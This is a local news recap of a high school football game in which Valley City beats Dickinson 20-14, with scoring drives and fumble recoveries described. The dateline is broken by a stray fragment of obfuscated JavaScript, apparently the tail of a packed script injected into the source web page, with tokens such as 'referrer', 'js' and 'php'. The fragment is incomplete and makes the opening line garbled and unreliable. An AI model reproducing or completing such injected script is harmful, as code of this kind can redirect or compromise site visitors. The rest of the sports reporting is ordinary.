DICKINSON, fbbzk|var|u0026u|referrer|ffyrk||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) After transportation issues delayed the start of the game, Valley City fought back to defeat Dickinson High School 20-14 at Biesiot Activities Center in Dickinson.
After a 48-0 win a season ago in Valley City, it looked like the Midgets were on their way to another dominating win. On their second drive of the game, Dickinson scored on a 40 yard touchdown by Kass Dvorak. Then after forcing a three and out, Dvorak would strike again on a 30 yard run lifting Dickinson to a 14-0 lead.
It wasn’t until late in the second quarter that Valley City started to turn the momentum. In 12 plays, the Hi-Liners would drive 65 yards down the field to score on a touchdown pass from Jared Lentz to Nate Rodriguez.
On the Midgets next drive, Valley City would set the tone for the rest of the game. With just over two minutes to play in the half, Rodriguez worked his way past the Dickinson offensive line striping the ball from the Midgets runner and putting the ball on the ground. With the reflexes of a cat Noah Kvilvang pounced on the ball. It was the first of three fumble recoveries for the Hi-Liners in the game.
Trailing by eight in the second half, Valley City evened up the score on a 21 yard John Halgrimson run. He would follow that up by sneaking the ball in the end zone for the two point conversion.
After another fumble recovery, Valley City would complete the comeback on Rodriguez’s second touchdown of the night.
The Hi-Liners return home next Friday night when they host Dickinson Trinity at 7pm. That game will air on 1490 KOVC
